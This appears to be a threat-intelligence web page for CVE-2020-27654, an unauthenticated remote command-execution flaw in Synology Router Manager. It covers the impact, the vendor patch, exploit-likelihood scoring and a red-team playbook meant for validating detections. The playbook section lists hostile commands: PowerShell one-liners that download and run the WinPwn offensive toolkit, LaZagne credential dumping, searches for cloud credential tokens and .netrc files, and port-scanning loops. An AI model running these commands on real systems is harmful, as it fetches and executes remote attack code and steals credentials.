CVE-2020-27654
Overview
This vulnerability is an improper access control flaw in the lbd component of Synology Router Manager (SRM). The root cause is the lack of proper authorization checks on TCP ports 7786 and 7787, which handle specific management functions. The affected component is the lbd service responsible for processing incoming commands on these ports in SRM versions prior to 1.2.4-8081.
Vulnerability Description
Improper access control vulnerability in lbd in Synology Router Manager (SRM) before 1.2.4-8081 allows remote attackers to execute arbitrary commands via port (1) 7786/tcp or (2) 7787/tcp.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary commands on the affected device by connecting to TCP ports 7786 or 7787. This enables full system compromise, including data theft, device manipulation, or disruption of network services. No user interaction or prior authentication is required, as indicated by CVSS vector AV:N/AC:L/PR:N/UI:N, making exploitation straightforward from the network. The business consequence includes potential loss of confidentiality, integrity, and availability of the router and connected network.
Solution
Synology has addressed this vulnerability in SRM version 1.2.4-8081. Users should upgrade to this version or later as detailed in Synology Security Advisory SA-20-14 (https://www.synology.com/security/advisory/Synology_SA_20_14). The advisory provides step-by-step instructions for updating the router firmware. No alternative workarounds are specified; applying the official patch is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The improper access control vulnerability in Synology Router Manager (SRM) presents a significant risk to users of affected versions prior to 1.2.4-8081. This flaw allows remote attackers to execute arbitrary commands on the device through specific TCP ports, namely 7786 and 7787. The root cause of this vulnerability lies in inadequate validation of user permissions, enabling an unauthorized user to bypass security checks. By exploiting this weakness, attackers can gain control over the router's functionalities, potentially leading to unauthorized access to sensitive data or manipulation of network traffic.
Attack vectors for this vulnerability are particularly concerning due to the nature of the affected product. An attacker could initiate a remote connection to the vulnerable ports, leveraging tools to send crafted requests that exploit the access control flaw. For instance, an attacker could use a simple command-line utility to interact with the router, sending commands that the system would execute without proper authentication. This scenario could escalate quickly, as the attacker could not only manipulate the router settings but also pivot to other devices on the network, leading to further compromises.
The real-world impact of this vulnerability is substantial, particularly for businesses relying on Synology routers for network management. The potential for arbitrary command execution means that attackers could disrupt network services, steal sensitive information, or deploy malware within the network. The business risk is amplified by the high CVSS score of 9.8, indicating critical severity. Organizations could face significant financial losses, reputational damage, and regulatory repercussions if sensitive data is compromised or if the network is used for malicious activities without detection.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating the Synology Router Manager to the latest version is crucial, as updates often include patches for known vulnerabilities. Network monitoring tools can help identify unusual traffic patterns or unauthorized access attempts on the affected ports. Additionally, employing intrusion detection systems (IDS) can provide alerts on suspicious activities, allowing for timely responses. Organizations should also enforce strict access controls and network segmentation to limit the potential impact of any exploitation attempts.
In conclusion, the improper access control vulnerability in Synology Router Manager poses a critical threat to network security. The ability for attackers to execute arbitrary commands remotely can lead to severe consequences for affected organizations. By understanding the technical details, potential attack vectors, and real-world implications, businesses can better prepare their defenses. Proactive detection and mitigation strategies are essential to safeguard against this and similar vulnerabilities, ensuring the integrity and security of network environments.
CSURFACE threat intelligence has identified a significant increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2020-27654, rising by over 50% to place it within the 90th percentile of exploit likelihood. This upward trend, while not yet rapid, indicates growing confidence in the feasibility or attractiveness of exploiting this improper access control vulnerability in Synology Router Manager. Although no new exploit techniques or active campaigns have been detected by our telemetry, the elevated EPSS suggests that threat actors may be prioritizing this vulnerability in their targeting strategies. For defenders, this shift underscores an increased probability of exploitation attempts in the near term, warranting heightened vigilance despite the absence of confirmed exploit activity. Consequently, the risk profile for CVE-2020-27654 has escalated from a theoretical critical threat to one with a more imminent exploitation potential, emphasizing the need to monitor for emerging indicators and anomalous behavior associated with ports 7786 and 7787.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Synology | Router Manager | All |
cpe:2.3:a:synology:router_manager:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-58 | Restful Privilege Elevation |
35%
|
High | High | |
| CAPEC-122 | Privilege Abuse |
30%
|
High | Medium | |
| CAPEC-233 | Privilege Escalation |
30%
|
— | — |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-27654 |
| synology.com |
GitHub CVE
x_refsource_CONFIRM
|
https://www.synology.com/security/advisory/Synology_SA_20_14 |
| talosintelligence.com |
GitHub CVE
x_refsource_MISC
|
https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1065 |
| talosintelligence.com |
GitHub CVE
x_refsource_MISC
|
https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1064 |